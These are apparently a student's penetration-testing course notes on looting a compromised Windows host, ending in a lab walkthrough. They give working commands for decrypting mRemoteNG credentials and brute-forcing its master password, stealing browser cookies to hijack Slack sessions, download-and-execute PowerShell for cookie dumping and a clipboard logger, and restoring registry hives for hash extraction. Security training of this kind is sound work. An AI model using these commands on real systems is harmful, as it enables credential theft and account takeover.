26 - Pillaging - JA Smith

# Intro - Pillaging = searching for sensitive/useful info on a compromised host - Potential data sources - Installed apps - Installed services - webservers - files shares - directory services - dbs - name servers - deployment services - CAs - source code mgmt server - virtualization - messaging - monitoring and logging services - backups - sensitive data - keylogging - screen capture - network pcap - previous audit reports - user info - history files and intersting docs - roles and privs - web browsers - messaging clients # Enumerating Installed Apps - Check `c:\program files` and `c:\program files (x86)` ```cmd dir \program files ``` ```powershell $INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation $INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation $INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize ``` - From the above we find `mRemoteNG`, which saves connection info and credentials to a file called `confCons.xml` - By default, the config file is located in `%USERPROFILE%\APPDATA\Roaming\mRemoteNG` - When we `type C:\Users\julio\AppData\Roaming\mRemoteNG\confCons.xml`, we find an encrypted - Let's attempt to decrypt with `mremoteng_decrypt.py` ```bash python3 mremoteng_decrypt.py -s "<encrypted_string>" ``` - If we get an error, we can attempt to use the `-p` flag assuming there's a custom master password ```bash python3 mremoteng_decrypt.py -s "<custom_master_password>" -p admin ``` - We can also concoct a `for` loop with a short wordlist to attempt to crack the password ```bash for password in $(cat /usr/share/wordlists/fasttrack.txt);do echo $password; python3 mremoteng_decrypt.py -s "<custom_master_password>" -p $password 2>/dev/null;done ``` --- # Abusing Cookies to Get Access to IM Clients - Example IM client include `slack` and `microsoft teams` - Multiple posts refer to how to abuse `Slack` such as [Abusing Slack for Offensive Operations](https://posts.specterops.io/abusing-slack-for-offensive-operations-2343237b9282) and [Phishing for Slack-tokens](https://thomfre.dev/post/2021/phishing-for-slack-tokens/) ## Extracting Cookies from Firefox - Firefox saves the cookies in an SQLite database in a file named `cookies.sqlite` - This file is in each user's APPDATA directory `%APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release` - There's a piece of the file that is random; we can use a wildcard in PowerShell to copy the file content ```powershell copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite . ``` - After moving `cookies.sqlite` to Kali, we can use [cookieextractor.py](https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/cookieextractor.py) to extract cookies therefrom ```bash python3 cookieextractor.py --dbpath "/home/plaintext/cookies.sqlite" --host slack --cookie d ``` - Now that we have the cookie, we can use any browser extension to add the cookie to our browser - For this example, we will use Firefox and the extension [Cookie-Editor](https://cookie-editor.cgagnier.ca/) - Our target website is `slack.com`, and now that we have the cookie, we can the user. - So let's navigate to `slack.co`m once the page loads, click on the icon for the Cookie-Editor extension, and modify the value of the `d` cookie with the value you have from the `cookieextractor.py` script ![[images/Pasted image 20260225195733.png]] - Once the cookie is saved, refresh the page and confirm that we are now logged in as the user associated with the cookie ![[images/Pasted image 20260225195816.png]] - Now we are logged in as the user and can click on `Launch Slack` - We may get a prompt for credentials or other types of authentication information; we can repeat the above process and replace the cookie `d` with the same value we used to gain access the first time ![[images/Pasted image 20260225195901.png]] - Once we complete this process for every website where we get a prompt, we need to refresh the browser, click on `Launch Slack` and use Slack in the browser - After gaining access, we can use built-in functions to search for common words like passwords, credentials, PII, or any other information relevant to our assessment ![[images/Pasted image 20260225195946.png]] ## Extracting Cookies from Chromium - The chromium-based browser also stores its cookies information in an SQLite database - The only difference relative to Firefox is that the cookie value is encrypted with [Data Protection API (DPAPI)](https://docs.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection) - To get the cookie value, we'll need to perform a decryption routine from the session of the user we compromised using a tool like [SharpChromium](https://github.com/djhohnstein/SharpChromium) - `SharpChromium` connects to the current user SQLite cookie database, decrypts the cookie value, and presents the result in JSON format ```powershell IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSh arpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1') Invoke-SharpChromium -Command "cookies slack.com" ``` - If we get an error, it may be because the cookie path that is hardcoded in `SharpChromium` has been changed for the current `chromium` version - We can update this as below ```powershell copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies" ``` - Now use `Invoke-SharpChromium` again ```powershell Invoke-SharpChromium -Command "cookies slack.com" ``` --- # Clipboard - In many cases, network admins use password managers to store their credentials and copy and paste passwords into login forms - To this end, `clipboard` provides access to a significant amount of information - We can use the [Invoke-Clipboard](https://github.com/inguardians/Invoke-Clipboard/blob/master/Invoke-Clipboard.ps1) script to start a logger to ultimately extract data from the user's clipboard ```powershell IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1') Invoke-ClipboardLogger ``` - After waiting a time, check for extracted info by running the script again ```powerhshell Invoke-ClipboardLogger ``` --- # Roles and Services - Typical server roles and services include the following: - File and Print Servers - Web and Database Servers - Certificate Authority Servers - Source Code Management Servers - Backup Servers ## Attacking Backup Servers - If we gain access to a `backup system`, we may be able to review backups, search for interesting hosts and restore data - In the below example, we will use [restic](https://restic.net/), which is a modern backup program that can back up files in Linux, BSD, Mac, and Windows - For example, we could back up the repository `C:\xampp\htdocs\webapp` in `E:\restic\` directory - Below we will initialize a backup directory ```powershell mkdir E:\restic2; restic.exe -r E:\restic2 init ``` - Next, create a backup ```powershell $env:RESTIC_PASSWORD = 'Password' PS C:\htb> restic.exe -r E:\restic2\ backup C:\SampleFolder ``` - Then, create a backup of a different directory with VSS ```powershell restic.exe -r E:\restic2\ backup C:\Windows\System32\config --use-fs-snapshot ``` - Now, we can check backups saved to our repo ```powershell restic.exe -r E:\restic2\ snapshots ``` - Finally, we can restore a backup based on an ID ```powershell restic.exe -r E:\restic2\ restore 9971e881 --target C:\Restore ``` --- # Exercise ## login as `peter` - `ping` test ![[images/Pasted image 20260225201844.png]] - `nmap` scan ![[images/Pasted image 20260225201849.png]] - `rdp` into target with given creds for `peter` - light internal enum ![[images/Pasted image 20260225202112.png]]![[images/Pasted image 20260225202230.png]] - check installed apps ![[images/Pasted image 20260225202032.png]] - I see `xammp`, `slack`, and `mRemoteNG` - Look at `mRemoteNG` config file and `type` ![[images/Pasted image 20260225202508.png]] - `git clone mRemoteNG-Decrypt` on Kali ![[images/Pasted image 20260225202648.png]] - now try decrypting password for `grace` ![[images/Pasted image 20260225202748.png]] ## login as `grace` - light internal enum ![[images/Pasted image 20260225203147.png]] - look for firefox `cookies.sqlite` and copy with ```powershell copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite . ``` ![[images/Pasted image 20260225203517.png]] - reconnect with `rdp` such that we have a shared drive to move the db - NOTE: ensure target Kali directory has 777 perms ![[images/Pasted image 20260225203951.png]] ```bash sudo chmod 777 . xfreerdp3 /v:10.129.203.122 /u:grace /p:<password> /dynamic-resolution /drive:linux,. ``` - now that we have `cookies.sqlite` on Kali, we need to `wget cookieextractor.py` ![[images/Pasted image 20260225204229.png]] - next, on Kali, we can extract `slack` cookies from `cookies.sqlite` ![[images/Pasted image 20260225204511.png]] - then, visit `slacktestapp.com` ![[images/Pasted image 20260225204649.png]] - we need to import the cookie and save, then refresh ![[images/Pasted image 20260225204836.png]] - oh wow now we have the flag and a password for `jeff` ## login as `jeff` - we have access to an elevated shell Webmaster001! - light internal enum ![[images/Pasted image 20260225205144.png]] - We have `Backup Operators` membership and related privs - Restore directory containing the files needed to obtain the password hashes for local users - Look at `restic` snapshots using `Password` ![[images/Pasted image 20260225205458.png]] - `backup.conf` on the desktop includes a line noting `restic.exe -r E:\restic snapshots` with password found therein ![[images/Pasted image 20260225210610.png]] - try to retore the latest `\windows\system32\config` dir ![[images/Pasted image 20260225210733.png]] - navigate to the mount point - we have SAM, SECURITY, and SYSTEM hives here ![[images/Pasted image 20260225210913.png]] - standup smb server on Kali and move above hives over ![[images/Pasted image 20260225211123.png]] ![[images/Pasted image 20260225211138.png]] - now run `secretsdump.py` ![[images/Pasted image 20260225211229.png]]